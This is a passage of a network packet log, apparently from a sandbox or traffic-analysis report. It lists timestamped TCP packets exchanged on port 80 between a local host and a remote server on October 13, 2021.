Oct 13, 2021 17:05:26.815212965 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815215111 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815274000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815319061 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815330982 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815340996 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815390110 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815395117 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815444946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815455914 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815502882 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815505981 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815566063 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815578938 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815623999 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815640926 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815685034 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815690041 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815740108 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815754890 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815795898 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815817118 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815850973 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815864086 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815891027 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815918922 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815928936 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815963030 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.815967083 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.815983057 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816004992 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816035986 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816051006 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816080093 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816099882 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816133022 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816143990 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816159964 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816186905 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816225052 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816226959 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816232920 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816262960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816301107 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816303015 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816323042 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816338062 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816359997 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816385031 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816401005 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816426992 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816458941 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816463947 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816482067 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816502094 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816523075 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816539049 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816546917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816575050 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816612005 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816612005 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816629887 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816649914 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816684008 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816698074 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816703081 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816740036 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816766977 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816776991 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816798925 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816813946 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816828012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816853046 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816881895 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816889048 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816905022 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816927910 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816946030 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.816966057 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.816999912 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817013025 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817018986 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817054987 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817070961 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817091942 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817106962 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817128897 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817158937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817167044 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817181110 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817203045 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817219973 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817240953 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817248106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817286968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817308903 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817320108 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817348957 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817357063 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817373037 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817382097 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817399025 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817408085 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817425966 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817451954 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817451954 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817467928 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817476988 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817481995 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817502975 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817516088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817534924 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817548037 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817564964 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817565918 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817590952 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817600012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817616940 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817625046 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817642927 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817656994 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817668915 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817691088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817693949 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817708015 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817722082 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817729950 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817754984 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817764997 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817783117 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817790031 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817807913 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817830086 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817833900 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817853928 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817859888 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817869902 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817884922 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.817892075 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817930937 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.817954063 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819107056 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819169998 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819211006 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819271088 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819283962 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819304943 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819310904 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819310904 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819317102 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819350958 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819384098 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819390059 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819403887 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819426060 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819442034 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819467068 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819494963 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819516897 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819539070 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819560051 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819569111 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819601059 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819631100 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819632053 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819660902 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819688082 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819710016 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819722891 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819729090 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819729090 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819758892 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819770098 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819788933 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819811106 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819823980 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819849968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819880962 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819885969 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819917917 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819924116 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819947958 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.819967985 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.819981098 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820007086 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820035934 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820050001 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820071936 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820075989 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820111036 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820115089 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820135117 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820153952 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820171118 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820194960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820202112 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820235968 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820266962 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820271969 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820305109 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820306063 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820327044 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820346117 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820374012 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820382118 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820409060 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820421934 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820456028 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820461988 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820489883 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820494890 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820528984 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820534945 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820563078 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820575953 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820583105 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820614100 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820636034 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820652008 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820683002 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820688963 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820720911 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820724010 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820741892 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820761919 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820785046 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820800066 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820817947 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820842028 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820866108 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820880890 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820899963 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820920944 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820943117 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.820961952 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820993900 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.820995092 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821017027 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821032047 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821052074 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821070910 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821084976 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821110010 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821142912 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821152925 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821180105 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821192026 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821216106 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821230888 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821249008 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821269989 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821290970 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821309090 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821321964 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821347952 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821353912 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821384907 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821414948 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821418047 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821448088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821455956 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821477890 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821496964 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821512938 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821536064 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821566105 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821578979 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821604967 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821611881 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821634054 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821646929 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821671963 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821702003 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821702003 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821732998 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821738958 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821743011 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821768999 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821780920 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821813107 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821815968 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821842909 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821851969 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821880102 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821913958 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.821918011 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821954012 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821980000 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.821995020 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822024107 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822027922 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822055101 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822087049 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822088003 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822127104 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822160006 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822185993 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822191000 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822225094 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822253942 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822256088 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822288990 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822293997 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822319984 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822335005 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822360039 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822371960 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822392941 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822415113 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822427988 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822457075 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822488070 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822491884 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822526932 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822531939 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822565079 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822568893 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822598934 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822607994 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822624922 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822644949 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822655916 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822684050 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822711945 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822721958 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822742939 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822762966 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822791100 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822797060 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822834969 CEST	80	49167	192.3.222.155	192.168.2.22
Oct 13, 2021 17:05:26.822837114 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822845936 CEST	49167	80	192.168.2.22	192.3.222.155
Oct 13, 2021 17:05:26.822873116 CEST	80	49167	192.3.222.155	192.168.2.22
